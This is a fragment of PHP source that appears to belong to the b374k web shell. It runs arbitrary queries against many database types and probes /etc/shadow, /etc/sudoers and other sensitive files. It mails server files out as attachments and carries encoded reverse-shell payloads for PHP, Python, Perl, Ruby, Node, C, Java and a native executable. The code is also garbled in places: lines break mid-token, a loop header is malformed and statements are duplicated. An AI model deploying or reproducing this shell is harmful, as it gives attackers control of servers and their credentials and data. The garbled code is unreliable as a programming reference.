        if($sqltype == 'mysql'){
            if(class_exists('mysqli_result')) return $result->fetch_row();
            elseif(function_exists('mysql_fetch_row')) return mysql_fetch_row($
result);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array
($result,1);
            elseif(function_exists('mssql_fetch_row')) return mssql_fetch_row($
result);
        }
        elseif($sqltype == 'pgsql') return pg_fetch_row($result);
        elseif($sqltype == 'oracle') return oci_fetch_row($result);
        elseif($sqltype == 'sqlite3') return $result->fetchArray(1);
        elseif($sqltype == 'sqlite') return sqlite_fetch_array($result,1);
        elseif($sqltype == 'odbc') return odbc_fetch_array($result);
        elseif($sqltype == 'pdo') return $result->fetch(2);
    }
}

if(!function_exists('sql_close')){
    function sql_close($sqltype,$con){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli')) return $con->close();
            elseif(function_exists('mysql_close')) return mysql_close($con);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_close')) return sqlsrv_close($con);
            elseif(function_exists('mssql_close')) return mssql_close($con);
        }
        elseif($sqltype == 'pgsql') return pg_close($con);
        elseif($sqltype == 'oracle') return oci_close($con);
        elseif($sqltype == 'sqlite3') return $con->close();
        elseif($sqltype == 'sqlite') return sqlite_close($con);
        elseif($sqltype == 'odbc') return odbc_close($con);
        elseif($sqltype == 'pdo') return $con = null;
    }
}

if(!function_exists('sql_get_supported')){
    function sql_get_supported(){
        $db_supported = array();

        if(function_exists("mysql_connect")) $db_supported[] = 'mysql';
        if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $
db_supported[] = 'mssql';
        if(function_exists("pg_connect")) $db_supported[] = 'pgsql';
        if(function_exists("oci_connect")) $db_supported[] = 'oracle';
        if(function_exists("sqlite_open")) $db_supported[] = 'sqlite';
        if(class_exists("SQLite3")) $db_supported[] = 'sqlite3';
    }
}
```

```

if(function_exists("odbc_connect")) $db_supported[] = 'odbc';
if(class_exists("PDO")) $db_supported[] = 'pdo';

return implode(",", $db_supported);
}
}

if(isset($p['dbGetSupported'])){
    $res = sql_get_supported();
    if(empty($res)) $res = "error";
    output($res);
}

elseif(isset($p['dbType'])&&isset($p['dbHost'])&&isset($p['dbUser'])&&isset($p['dbPass'])&&isset($p['dbPort'])){
    $type = $p['dbType'];
    $host = $p['dbHost'];
    $user = $p['dbUser'];
    $pass = $p['dbPass'];
    $port = $p['dbPort'];

    $con = sql_connect($type , $host , $user , $pass);
    $res = "";

    if($con!==false){
        if(isset($p['dbQuery'])){
            $query = $p['dbQuery'];
            $pagination = "";
            if((isset($p['dbDB'])&&(isset($p['dbTable'])))){
                $db = trim($p['dbDB']);
                $table = trim($p['dbTable']);
                $start = (int) (isset($p['dbStart']))? trim($p['dbStart']):
0;
                $limit = (int) (isset($p['dbLimit']))? trim($p['dbLimit']):
100;

                if($type=='mysql'){
                    $query = "SELECT * FROM ".$db.".".$table." LIMIT ".$start.", ".$limit."";
                }
                elseif($type=='mssql'){
                    $query = "SELECT TOP ".$limit." * FROM ".$db."..".$table."";
                }
                elseif($type=='pgsql'){
                    $query = "SELECT * FROM ".$db.".".$table." LIMIT ".$limit." OFFSET ".$start."";
                }
                elseif($type=='oracle'){
                    $limit = $start + $limit;
                    $query = "SELECT * FROM ".$db.".".$table." WHERE ROWNUM BETWEEN ".$start." AND ".$limit."";
                }
                elseif($type=='sqlite' || $type=='sqlite3'){
                    $query = "SELECT * FROM ".$table." LIMIT ".$start.", ".$limit."";
                }
                else $query = "";

                $pagination = "Limit <input type='text' id='dbLimit' value='".html_safe($limit)."' style='width:50px;'>
<span class='button' onclick=k=\"db_pagination('prev');\">prev</span>
<span class='button' onclick=k=\"db_pagination('next');\">next</span>
<input type='hidden' id='dbDB' value='".html_safe($db)."'>
<input type='hidden' id='dbTable' value='".html_safe($table)."'>

```

```

        <input type='hidden' id='db
Start' value='".html_safe($start)."'>
    }
    $query = explode(";", $query);
    foreach($query as $query){
        if(trim($query) != ""){
            $query_query = sql_query($type, $query, $con);
            if($query_query!=false){
                $res .= "<p>".html_safe($query).";&nbsp;&nbsp;&nbsp;";
                if(!empty($pagination)){
                    $res .= "<p>".$pagination."</p>";
                }
                if(!is_bool($query_query)){
                    $res .= "<table class='border dataV
iew sortable tblResult'><tr>";
                    for($i = 0; $i < sql_num_fields($ty
pe, $query_query); $i++){
                        $res .= "<th>".html_safe(sq
l_field_name($type, $query_query, $i))."</th>";
                    }
                    $query_query){
                        $res .= "<tr>";
                        foreach($rows as $r){
                            if(empty($r)) $r =
                                $res .= "<td>".html
                                _safe($r)."</td>";
                            }
                        $res .= "</tr>";
                    }
                    $res .= "</table>";
                }
            }
            else{
                $res .= "<p>".html_safe($query).";&nbsp;&nbsp;&nbsp;";
                $res .= "<p>".html_safe($query).";&nbsp;&nbsp;&nbsp;";
            }
        }
    }
    else{
        if(($type!='pdo') && ($type!='odbc')){
            if($type=='mysql') $showdb = "SHOW DATABASES";
            elseif($type=='mssql') $showdb = "SELECT name FROM master..
sysdatabases";
            elseif($type=='pgsql') $showdb = "SELECT schema_name FROM i
nformation_schema.schemata";
            elseif($type=='oracle') $showdb = "SELECT USERNAME FROM SYS
.ALL_USERS ORDER BY USERNAME";
            elseif(($type=='sqlite3') || ($type=='sqlite')) $showdb = "
SELECT \"\".$host.\"\"";
            else $showdb = "SHOW DATABASES";
            $query_db = sql_query($type, $showdb, $con);
            if($query_db!=false) {
                while($db_arr = sql_fetch_data($type, $query_db)){
                    foreach($db_arr as $db){
                        if($type=='mysql') $showtbl = "SHOW
                        TABLES FROM \"\".$db;
                        elseif($type=='mssql') $showtbl = "
                        SELECT name FROM \"\".$db.\"\".sysobjects WHERE xtype = 'U'";
                        elseif($type=='pgsql') $showtbl = "
                        SELECT table_name FROM information_schema.tables WHERE table_schema='\"\".$db.\"\"";
                    }
                }
            }
        }
    }
}

```



```

);

foreach($access as $k=>$v){
    $version = execute($v);
    $version = explode("\n", $version);
    if($version[0]) $version = $version[0];
    else $version = "?";

    $res .= "<tr><td>".$k."</td><td>".$version."</td></tr>";
}

if(!is_win()){
    $interesting = array(
        "/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases",
        "/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf",
        "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
        "/etc/ssh/sshd_config",
        "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf",
        "/etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf",
        "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
        "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
        "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
    foreach($interesting as $f){
        if(@is_file($f) && @is_readable($f)) $res .= "<tr><td>".$f.
"</td><td><a data-path='".$html_safe($f)."' onclick='view_entry(this);'>".$f." is readable</a></td></tr>";
    }
}
$res .= "</table></div>";

if(!is_win()){
    // cpu info
    if($i_buff=trim(read_file("/proc/cpuinfo"))){
        $res .= "<p class='boxtitle' onclick=\"info_toggle('info_cpu')\" style='margin-bottom:8px;'>CPU Info</p>";
        $res .= "<div class='info' id='info_cpu' style='margin-bottom:8px;display:none;'>";
        $i_buffs = explode("\n\n", $i_buff);
        foreach($i_buffs as $i_buffss){
            $i_buffss = trim($i_buffss);
            if($i_buffss!=""){
                $i_buffsss = explode("\n", $i_buffss);
                $res .= "<table class='dataView'>";
                foreach($i_buffsss as $i){
                    $i = trim($i);
                    if($i!=""){
                        $ii = explode(":", $i);
                        if(count($ii)==2) $res .= "
<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
                    }
                }
                $res .= "</table>";
            }
        }
        $res .= "</div>";
    }
}

// mem info
if($i_buff=trim(read_file("/proc/meminfo"))){
    $res .= "<p class='boxtitle' onclick=\"info_toggle('info_mem')\" style='margin-bottom:8px;'>Memory Info</p>";
    $i_buffs = explode("\n", $i_buff);
    $res .= "<div class='info' id='info_mem' style='margin-bottom:8px;display:none;'><table class='dataView'>";
}

```



```

        foreach($i_buffs as $i){
            $i = trim($i);
            if($i!=""){
                $ii = explode(":",$i);
                if(count($ii)==2) $res .= "<tr><td>".$ii[0]
."</td><td>".$ii[1]."</td></tr>";
            }
            else $res .= "</table><table class='dataView'>";
        }
        $res .= "</table></div>";
    }

    // partition
    if($i_buff=trim(read_file("/proc/partitions"))){
        $i_buff = preg_replace("/\ +/", " ", $i_buff);
        $res .= "<p class='boxtitle' onclick=\"info_toggle('info_pa
rt');\" style='margin-bottom:8px;'>Partitions Info</p>";
        $res .= "<div class='info' id='info_part' style='margin-bot
tom:8px;display:none;'>";

        $i_buffs = explode("\n\n", $i_buff);
        $res .= "<table class='dataView'><tr>";
        $i_head = explode(" ", $i_buffs[0]);
        foreach($i_head as $h) $res .= "<th>".$h."</th>";
        $res .= "</tr>";
        $i_buffsss = explode("\n", $i_buffs[1]);
        foreach($i_buffsss as $i_b){
            $i_row = explode(" ", trim($i_b));
            $res .= "<tr>";
            foreach($i_row as $r) $res .= "<td style='text-align:
center;'>".$r."</td>";

            $res .= "</tr>";
        }
        $res .= "</table>";
        $res .= "</div>";
    }
}

$phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO
_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP
Variables" => INFO_VARIABLES);
foreach($phpinfo as $p=>$i){
    $res .= "<p class='boxtitle' onclick=\"info_toggle('".$i."');\" sty
le='margin-bottom:8px;'>".$p."</p>";
    ob_start();
    eval("phpinfo('".$i."');");
    $b = ob_get_contents();
    ob_end_clean();
    if(preg_match("/<body>(.*?)</body>/is", $b, $r)){
        $body = str_replace(array(" ", "&"), array(" ", "
", "&"), $r[1]);
        $body = str_replace("<table", "<table class='boxtbl' ", $bo
dy);
        $body = preg_replace("/<tr class=\"h\">(.*?)</tr>/", "", $
body);
        $body = preg_replace("/<a href=\"http:\\/\\/www.php.net\\/ (.??
?)</a>/", "", $body);
        $body = preg_replace("/<a href=\"http:\\/\\/www.zend.com\\/ (.??
?)</a>/", "", $body);

        $res .= "<div class='info' id='".$i."' style='margin-bottom
:8px;display:none;'>".$body."</div>";
    }
}

$res .= "<span class='button colSpan' onclick=\"info_refresh();\" style='ma
rgin-bottom:8px;'>refresh</span><div style='clear:both;'></div>";
return $res;
}
}

```

```

if(isset($p['infoRefresh'])){
    output(info_getinfo());
}

$GLOBALS['module']['mail']['id'] = "mail";
$GLOBALS['module']['mail']['title'] = "Mail";
$GLOBALS['module']['mail']['js_ontabselected'] = "if(!portableMode) $('#mailFrom').focus();";
$GLOBALS['module']['mail']['content'] = "
<table class='boxtbl'>
<thead>
    <tr><th colspan='2'><p class='boxtitle'>Mail</p></th></tr>
</thead>
<tbody id='mailTBody'>
    <tr><td style='width:120px'>From</td><td colspan='2'><input type='text' id='mailFrom' value='' onkeydown=\"trap_enter(event, 'mail_send');\"></td></tr>
    <tr><td>To</td><td><input type='text' id='mailTo' value='' onkeydown=\"trap_enter(event, 'mail_send');\"></td></tr>
    <tr><td>Subject</td><td><input type='text' id='mailSubject' value='' onkeydown=\"trap_enter(event, 'mail_send');\"></td></tr>
</tbody>
<tfoot>
    <tr><td colspan='2'><textarea id='mailContent' style='height:140px;min-height:140px;'></td></tr>
    <tr>
        <td colspan='2'><span style='width:120px;' class='button' onclick=\"mail_send();\">send</span>
        <span style='width:120px;' class='button' onclick=\"mail_attach();\">attachment</span>
    </td>
    </tr>
    <tr><td colspan='2'><span id='mailResult'></span></td></tr>
</tfoot>
</table>
";

if(!function_exists('send_email')){
    function send_email($from, $to, $subject, $msg, $attachment){
        $headers = "MIME-Version: 1.0\r\n".$from;

        $rand = md5(time());
        $headers .= "Content-Type: multipart/mixed; boundary=\"".$rand."\"";

        $headers .= "--".$rand."";
        $headers .= "Content-Type: text/html; charset=\"UTF-8\"";
        $headers .= "Content-Transfer-Encoding: 8bit";
        $headers .= $msg."";

        if(count($attachment)>0){
            foreach($attachment as $file){
                if(is_file($file)){
                    $content = chunk_split(base64_encode(read_file($file)));

                    $headers .= "--".$rand."";
                    $headers .= "Content-Type: application/octet-stream";
                    $headers .= "Content-Transfer-Encoding: base64";
                    $headers .= "Content-Disposition: attachment";
                    $headers .= $content."";
                }
            }
        }
        $headers .= "--".$rand."";
        if(@mail($to, $subject, "", $headers)) return true;
    }
}

```

```

return false;
}
}

if(isset($p['mailFrom'])&&isset($p['mailTo'])&&isset($p['mailSubject'])&&isset($p['mailContent']))){
    $mailFrom = trim($p['mailFrom']);
    $mailTo = trim($p['mailTo']);
    $mailSubject = trim($p['mailSubject']);
    $mailContent = trim($p['mailContent']);
    $mailAttachment = trim($p['mailAttachment']);
    $mailAttachment = (!empty($mailAttachment))? explode("{|b374k|}", $p['mailAttachment']):array();

    if(empty($mailTo)) output("Please specify at least one recipient");
    if(!empty($mailFrom)){
        $mailFrom = "From: ".$mailFrom."\r\nReply-To: ".$mailFrom."\r\n";
    }

    foreach($mailAttachment as $file){
        $file = trim($file);
        if(empty($file)) continue;
        if(!is_file($file)) output("No such file : ".$file);
    }

    if(send_email($mailFrom, $mailTo, $mailSubject, $mailContent, $mailAttachment)) output("Mail sent to ".html_safe($mailTo));
    output("Failed to send mail");
}

$server_addr = isset($_SERVER['SERVER_ADDR'])? $_SERVER['SERVER_ADDR']:isset($_SERVER['HTTP_HOST'])?$_SERVER["HTTP_HOST"]:"";
$remote_addr = isset($_SERVER['REMOTE_ADDR'])? $_SERVER['REMOTE_ADDR']:"";
$default_port = 13123;
$winbinary = (strtolower(substr(PHP_UNAME(),0,3))=="win")? "<option>executable</option>":"";
;

$GLOBALS['resources']['rs_php'] = "7VRnj9s2ED3bv0JRBSyFKrZlFwiwLjeX9lGgaAv0kNOKMkwtCESiy6FqB9397x1+yB8bZzdIgl15aGJbIGc6b4czT+/6tatT0m6gxRsH1fh4vTDNsZkx2883qzXdb/5xyraUuNFdSG9Hfk0W6ngI3hREDL1rRCeNMcl0ITrWCCVPU7QANQeM0MaW+5wYo36tWVpzEUZwFI/oTBjRfrd7galFsfmhbXPHDChoaYyAmjn798eef6N5w3a3f/ZLTq9vk3W8/3Fytgxtt6/lG9HNootcixtiOxq7+CBrettFlxGTfc2Z4ddujfypqwuTQgzKWmFKap39NJ4miwbTGDVYQ27dBOFXuH6c8hb4pfdleTi8X9x5iIMhvXuxSrZlWLaOeuiZEbIv+F6AAXKLWG/aopZ6e5V6TFHRO9F2doJxzKxf5ynGGZKfWL11ESxKgtgXODMQFUnPI3wFWFK4n0sHFIZmZVeAZFscNXD9J9ckNkwhTxYz97uOZ4nKEqRHL90LY2zCMTRQRA7YI8hWrpIEPUEuGePKHGilotfIVu4wGwwb3BHkaDH0ZcdJmi2yVYr1xzvRu0In9U4Lw0nCsqSbYYfZDi84i29iCzfZNaJFp3pFaV3izFyIHVBth4FR7pTrkOb3RVcalpB4zqrbiLz//Rbuvk3nAumKt9Q69dGTPkoobv0ofbSAohKaoCdNWTMuvTuR9LQuZ3y0j0Aio0V3eutEuRva+cTrw0P0Cf8fA/rTaIO93K5HuAiT8b29MeZClS8+ynzSL+kKtKXUrJXAx3aM0zCrdFvpg612B5MKaKl1+YEs6I1fxEooHmexjtMsf2rcoXF5wejBlkZKS1ZIxXtM3mQIj50XyrmxUa+wy5qDHDSzN8R5HF1/yrlNi8yyOmWD8QvMFs+fyF88sXz2BAOTzaJh0Az+11zWdu2Pjz4lU+XpsepJboMPbR9DeWEpJ5Ah5wtahfB8xkqJX5uZWY18kBg0RdHHF0eyCpojGVMzMiNBxHGRQuIPRIyzOssaBLgKpVilT2AuDyGcdly4CP5xw9Ie+49Nc63+dp9qG9jnKjWXvGH/Tdi6IV6iCKtRUT9DGQQLv8T9q25erF3yResF/Vr3gknp9Sq/gf706OwEv6RV8nl7BV9IruKwG8K/pFXxtvYLP0at/LfJvb/4G";
$GLOBALS['resources']['rs_python'] = "rVrtb9owEP6c/IrUnYytU1Noq010QUJtO1VbWwRM+9B2KDgHiQpOZDst/fc7JykwxNQpmxBJ7sV399w958ODVqFVa5rKFshnL381SSbdQy8xJtfdVmuemqSYcpEtW9OTT6dP1dNN13mmjKfA18U0V5kArf1M+/oV/514AuObdAluHhDiJvYRw8zTCSwWVLCu69gzweYsH2Q5ScR80iUYqwIjmgzrzB9014PQqkGpfepU7mqZ6yghwZkelFIqI1lcQxZQ131QYbUulzA1lHkTIYqCNwsyOPjeYW5YfCZnmsqo/nXmZ5jJawkFapCGocmaB4LN0ATKjmnHb07bDwJISWJXtGofDm2B1QC3PB6N20PgW+HnZa5zXVlSdl4PQiXeUel8+kqY2is5Yk3i9baGzkTAPLDTY7C8JpvZs56zkGPVavh2FVSkQz7R93D1lPIYSGSmREVunAysBuam880jrUldHdSxShEQV6x1XCmcaKOAaIiUSSkT84NH7Xw/6scmIr/zZIpPr63D99fZuGF70RyGrjmGgaR2hbl8emYSnOk4VnfK5yoqcthl787ENFMmOsbbh4EDG9G/zqt02IDCYpVLJP8W2iiiMF8m4RIjffmMd2kru0ohX0+ggQqliw1vu7ppj5EGSjHy9ByNeLJ1Ij7jzAEnAIZV/dutOzlkQdOwKBPP79qMLiy39yUbvJPjuWDvmh1VqED7uUyoNzZmrg2rNePwItDs/mlzfhuN6B/no7uLbZDQehv0bPILAJDvk+dp/dPd9Yp22j0yG4Y9R2L+8HPqYcadozZGhMaxkmJc/4ue225ovUqS6pGcoWOrhKkcsQODCcsvuW4Zl9mbgegFgJ7oh8L6Vehs0Jew9U90gXtcTmZQgDMTY8r3TX4/+vQBkvfR746x33t2ZkgXpIUGrOJQmVSP2ojx7D6X+V5T6v6DU7Dc=";
$GLOBALS['resources']['rs_perl'] = "1ZJhb9MwEiY/17/CZF6bSIG0DampJhVVMqFqa1PFHqhrINL0WKylcRS7rKgrvx0ny2gEQoJ8s05en56zHuXsmbOTpbPmuQP5N1xamaEznCpVyKHj3HKV7tYvErF1lhevX909nmgnAU+D4ZCJ5A4URURIL3wJdCFT14B9IUqf1344c/cKyilDsIHbW5HFh8lq1KPNvQ5pvVem+Dk3KOJfzQr0Y+vc65Rbh5p27gUztvC9c+xcGfSiIHjvQRWlUGL9PY+3YPZUUvQsimT9GpPZ3cVlNj37S7vLAu8qYsvQH89soqyHhw0H06pXvR2H79677sA6oA4pXFK1n/qfKepIUBVKFBWLbDDRde0FkShf8P88WQS2gNN6ejXb/RMNR1vNmXec5MU9nReTUTj+UfRtLGTcakgl9MXrTB0EtBrPjTz9WKN82yjlox1ClmGhzgReQ6Jgs0qN+x+NscKyDFbTqZz23jT9Qz6FAQ3S9sYtRM/DJsEdWAPCdZOT+uTTE

```

```

gwPYs+FuxXUbFbjea2Os20ahxXuE8ROiLI5Mnoyz+NkrTpBnXHXZ6DimIltK+0pYPE7m8uCW9dNya0QxK34lob+zdtZ
qNt1GWGRZ+Sx1s7asRV0d/N/ZewWhMcKm2m/nuOSH8/AQ==";
$GLOBALS['resources'] ['rs_ruby'] = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy1lgu3
QoW387fiVrqXt1ivd66ples7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoa
zoGajwWlAPVcGHUwiDIICxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoANEJp3LG+KV5TxmfzMKor0QDv
fGwLBAAz51FAcPSO01IJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ
0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfod1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB9
8APEdhI2TkG4dWQ1NZTykFGoHpHEtGFey2DZgWUBZ4h6mFedAFEQZJxY3ggnj9sksHSivl08FX1jjlJoqsCUhnAPF0v
oZdwic15VQ+OT18bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdmlc09wamsYuu2/TmP
SYxifbIIVlCzQrdaVzq2CeglhMySwyZBaxCVOKZqEzypWlGziAT/dlkBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp
6e+ORiasG4ARm7zxRht1cz0/VFXiR79TRhrvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+
mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDjSk+8RPzd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4
PwluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8e jvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+by
FCb2Tzo1Qu11S1hSudYWoJuISkbp1rDTMJLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdlmLcty29MsDmKdpBX3S5r
/o1z8Mh10ym3nM4lp353m/8zsHbkgJ82E6WbM/1kJwz58XKTZ8FG8gs=";
$GLOBALS['resources'] ['rs_node'] = "nVhLbsIwEDwbiX+IcokjIVsqSJVAnPoJpDKHjLNgq46T2g5UQvx7/Qg
U6ENVcrCy07Ozu70UZsK51s4p3UonuJxHtU3X0/vZW3rHox0zmW3ZXmfLzMB7Jw3gggupqt fWNBySLUoSCYtEluAuqT
4syh6yZgCrL9GUORN4o22j4KpVskVKryJAKU8p6FPqakXhEbnB/TskVcxtG10TmjkuMH3Ze5Ysy686X1cEPqA4KzKz3
XngpBDCpBn+iAK9dWK5nJaH8QgFvvBkvxfhfngHj2B2YPCm09zJRMmBecisvZEOcB6N7LvPw4oauIPqSedhp6z/0mZe
OHqJI/0St4JYV01NDNiuBlzeQk3ni0+eV8yxfHKaJsMhLg+naWK0OH5XBmMglv9Vdhr6WzVKryBKWgc6Or26ew7J43g
EykJ26//s7L+98v8hORqs71Um8aKraZT77yHQbxdAP1iPBnqOBpqNhr18/AQ=";
$GLOBALS['resources'] ['rs_gcc'] = "rVJhb9owEP0Mv8JjU+TqJ5C006TSVEKFSWgtRMA0TRuKgmPIqcGOYjNB
p/732nFgwLRJk/ohyd2713f2vXObKFUq19euuSVructKlbu/PLj1aN9o6ZbfwucZuuEoRupEhCt9PYIKoAvT7Ekg/k
JtpWu2uZM/g1LQR+ZosY5U6AfF/gxvuag1Q0GXKFVDBYbIC6W1NA0L1BThz+/z5xf9ZopSEKJCLxOvaYpuqYa0M3iJC
ki4Ag0DatSfg4C3/xSg5YEHi3iFWTboPspGgz7084ez0WhglQJLnGsBOCylzdzN8Uo92S5adkZngw7PZ646g7/FbSZ
GDv1yt1Mhndfy4m03G/+0DalsKU4YhcYanL95GhLmXo3P8y6Rs9ciaIhCcmFlhU/Rf4jXTYBhS2MnPgIRbAJzdHTecM
SHvJwWb8q45n0oUxrElLkyc3t/HK1DScMuhExZlqFrRAXnjCqW/OAN419V3GSd+5p7lHiHiW81t7rpCjfyxowUTfv
jh2CjWLHqhbMvOH8Xfu3dnneqqoZ0yChy9Y1cmaL30LbnZyRkmJr4uV5jmwRob+fl69tpFrKMLNGf2Sk/sULsEKJnne
lp7ggX3sUstP+5w4MwnA8mo6i6V248xvXw/6rm9UmnNqcx7lpH25E6aT8DyflceIdJq/vpLROptdfAA==";
$GLOBALS['resources'] ['rs_java'] = "lVRN9swDD2nQP+D4JM9BHaTddjWIsOwYYcBAzosvXXBICuMrdWWBYn
OB9L891Gy7LhrLz1Ekcg8vGRcpaxElHb6ywrJJZtnoqmvzK37989dOvlhax1Y5D95VueyiZ9c/PUpAC97fJct3k1BR
Mvt5b5y3+MPV5eTLsrw47ALHIkweYqXgWYRgZ7BLW27K40wNcOp1z4rnSLsyr7zaS9GbtuWzz7mhY9A3J3HDTGT+9On
11Ij1hKmq7oMh+S8aFi3TqQn2+3YIxcg2juNtGrplvZx4nhM0h24zyQ8I9yuWswVTsGP++GH2cb666fxSIRpkpDyu
zDhPgmNXygp18W1x1bAQa0Is0p2RCHE+vZqKHurtm6q1ZTYXox58n/dKjIKMv62F6BRNopBcoSUVfSkBRcPd4YLoHA
e7Jau+1Bv6Jgvu+ZSxaSfVAUVyklh0xFcZw4cf07Oz0S9J15RlkuV2TLyLrmJlweLUKcF4E/TaDB4iKPGporXECUpNj
+aHZiv3BKkVKo17G83cbSTKkqcPmcQlfi6ijm/ItNWP3DM11BV7JqJRikQCovfqs+6s/OEfhCzxtkXDbiAZCVoXfdM
fiGDhN9V3NagSqwXCxmYQm/iksaFYRCjCp5sYCHTz6/mrV92QJhuYppLJ9qpExdoF6tONiUy5c1/pmd/2EygL7n8z8
tWQ64aQmrHfNVqPEIxGknrIRr9PLUrDHR/Yyn/ErLKQv3Tqj8zDKD950EuzYmf2AUz+/oX0JhopAe6TQhd/tQplDe5
62NJEwR5ETMOTH8FqUWTOwsFk876GbwP19Incoj5GvZ2r4p+znCAZ1J6PsalT8+H7V1Gv7ziddLv9A8=";
$GLOBALS['resources'] ['rs_executable'] = "7Vh5VFPntj9JdKlIQgaZogY5aBssiExVRNCEwQ1CGQQVSOIJG
MmAYq1DtRIaQGMjXUoxZGwentbqlgpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDM+tt9b96623317Z39779/32zved
ZJ3z7R01yQjgAAAAUUQALgAvBEO8D+LBlWqcx0VqLK+4XIBw7vhEr9VooKylIoMpVAGpQnlcgUMpYohpVoOSerQSHQ
cJFOIx42NiT22xoxoQDAw+CAH1KaY/9dtw+g4cgYrAMAOEdlZPopwG11ai2v13dDI59s27M2/W/TX4zhwru9Qi9je
m/4ftfbwKt54cb/mPZagIA5n+QlxCT5PnaOfm7BWH/cn37UJ7Xv7fxev+z/srjvOF5/7a59rccu7/wTD4enitmtzFz
hprXWZ0rHvn3Z0jVw8CQCEVZbgBwCIACBhqQ5A47ZBfeQSHAXSZYNa1EDYRIIDY6p7xKZBNRdrZFDKdsWhgWF7TTaW3
gQTrZJAUYHCfCBjvctfh60WAJ2c1IOCA+My6kdq5XGeKqxuRw9f10cvkcqZAGaR32rvd+nNw1W5jf6ZCH0zX+c8X2V5
2wbV4xoBS/a2R+nP2XDqFfHhBpZabyoKHbB406JcRj/qVH/afPhd5GLfBPH+njR2ngFeBChqqmU0N72r53JM4H57U0
7gevzjnkADxh1Vj5kNEHeokIzlhdpJDK3wuc0tWtFJwiNpzWUvk7bJbXOjmyE7+CacGXj4Vq/IFd4x8IC613I+0IoWF
Oh0qxjnLUgAYYnLcL3N+W/tCi8ggKXCq2vwnK6+8ilmiAHKSPZXdKrq1+0tVhkyV/th1O2/FHtxVgHmccSpoZa5ZCO9
03V3p6aoKyn/n69K535eDrNc9UQfmDw6aqiuNFx0xctz+BD7SOT9oXWA5kvfUqcLxk jf2Ejy49W7jC/skp6dOM0oxF
IfzI6qbehMItaYb8E3U/NzAtnH7cCn07Y1AUmKuOwukuwzn8B0cHala9nZJS8oNvsvJBkGTRFy5jjdJM50VU87zRk+z
QjcUPcewVDSbhr9dcG+qrDd+1fVYJ1NENHYcKkQnd7WdfGYoga/C6RF7vLEEEvdTgT6uwxAQm5c4xxk07Ap3yrfUBL
REvDzdPdI0k39eF1nzQD+SR6BSxedlmcWHCRWbyfej33WjX3vQFj66FVibo8bb1TkNmF0NoE/tguksTNn1YPLsfsANb
aDUBNTmndixgsCKb9QmV4f2667Z1n8QbEprwIIfIpoh/HnqXyfJy/+SnobFaxlwSy8tXWV30MTG1U1LVKPBbBUz29QE
B33o2tiVytuBmpZzsp+JEW7yre76w1XOIxA4WcURWIQwOuRd0D1D3s1zYxr6yqp8beopn30tPIdEut1stj+5gd1NSGH
Fs/cKD6ftGo1WV5MeBodV5/xCHpy+WFvL05Zx5saMyZrnN9mUzKht+Isbt54QYF7mX1j7rfnnJzkjm72BJuUb3LCKyM
JiRh23fktIpRF2RHwmszSWNyGS1Q1HKwc9jW6Z3Xxa693c8b1UvcpAvV84NanvJPmb9ws+1HrKAphe9MaUCDYGUPxx
+osUevG0W3D6vhun9AX2DJD+nXlua7tLnFX197wDTIqn/wcX/4nEG8RjGzen8LcYhNP3kYXtkBa28TMS2ga0FO+WoY7
uMDra9/r7drdA2udNc7d6U7C39NtH7QvGR1ecwsh0Cxi7J1Yjhf3A3J76iz5+4dm9fUxwqLOKdtF1jW0Nj7ehsiLQ7f
6P/CE+NgkmXbOieExi4Vkj6Q7KEF+dpYRNQ12mktNSI9zwYjV1VfyovFdj2P14DhHzf0I7TB22IxZ+Uw95Lt+xWmPz
W7zThCb2prMRYwaBz4a5o+bp1yAo0eTdI3v0tY0TY1DQmwx0jGv9r+T53zhnjqi4yjfafa3TyjbrJaGHup48xmC1obV
iCfrVu/uWY2daHTSAFQqLw7g8mYukFP063rq4AofEriZmanyC1R8+UzLldkxmiZ3bksynaVbJz6E7uFd80TC0I2fz
MXOa67BZFA1iajQDMTt50cverieja4yEOWV3R32THM9+1EDfyNELsYn5gVfa8xzm0CsKE/Wjg3hPR/AOWWUQ1CP2oi
VzebW7RuG6FPYzZzUw+7wFMDg/001kx+tu6aTspFkMu03Py1OrdvsRwXVS3qIAQ/nE919fPTv6TusHqoD9P56vxfJ5
